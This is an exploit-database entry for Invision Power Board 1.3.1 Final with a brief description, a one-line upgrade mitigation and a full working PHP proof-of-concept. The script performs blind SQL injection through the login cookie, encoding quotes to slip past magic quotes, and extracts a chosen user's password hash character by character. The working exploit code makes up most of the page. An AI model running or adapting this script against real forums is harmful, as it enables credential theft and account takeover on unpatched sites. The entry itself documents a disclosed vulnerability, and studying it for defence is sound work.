Invision Power Board - exploit.company

vendor:

Invision Power Board

by:

str0ke

7,5

CVSS

HIGH

Password Hash Retrieval

CWE

Product Name: Invision Power Board

Affected Version From: 1.3.1

Affected Version To: 1.3.1 Final

Patch Exists: YES

Related CWE: N/A

CPE: a:invision_power_services:invision_power_board

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

Invision Power Board <= 1.3.1 Final Remote Password Hash Retrieval

This exploit allows an attacker to retrieve the password hash of a user on a vulnerable version of Invision Power Board. The exploit works by sending a crafted cookie to the server, which contains a malicious SQL query. The query is designed to return the password hash of the target user, which can then be used to gain access to the account.

Mitigation:

Upgrade to the latest version of Invision Power Board.

Source

Exploit-DB raw data:

<?php
/* 
<= 1.3.1 Final
/str0ke
*/

$server = "SERVER";
$port = 80;
$file = "PATH";

$target = 81;

/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";

$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
        $idx = 0;
        $found = false;

        while( !($found) ) {
                $letter = substr($hex, $idx, 1);

                /* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
                $cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
                $cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;

                /* Query is in effect: SELECT * FROM ibf_members
                                       WHERE id=$id AND password='$pass' OR
id=$target
                                       HAVING id=$target AND
MID(`password`,$i,1)='$letter' */

                $header = getHeader($server, $port, $file .
"index.php?act=Login&CODE=autologin", $cookie);
                if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
$header) ) {
                        echo $i . ": " . $letter . "\n";
                        $found = true;

                        $hash .= $letter;
                } else {
                        $idx++;
                }
        }
}

echo "\n\nFinal Hash: $hash\n";

function getHeader($server, $port, $file, $cookie) {
        $ip = gethostbyname($server);
        $fp = fsockopen($ip, $port);

        if (!$fp) {
                return "Unknown";
        } else {
                $com = "HEAD $file HTTP/1.1\r\n";
                $com .= "Host: $server:$port\r\n";
                $com .= "Cookie: $cookie\r\n";
                $com .= "Connection: close\r\n";
                $com .= "\r\n";

                fputs($fp, $com);

                do {
                        $header.= fread($fp, 512);
                } while( !preg_match('/\r\n\r\n$/',$header) );
        }

        return $header;
}
?>

// milw0rm.com [2005-06-08]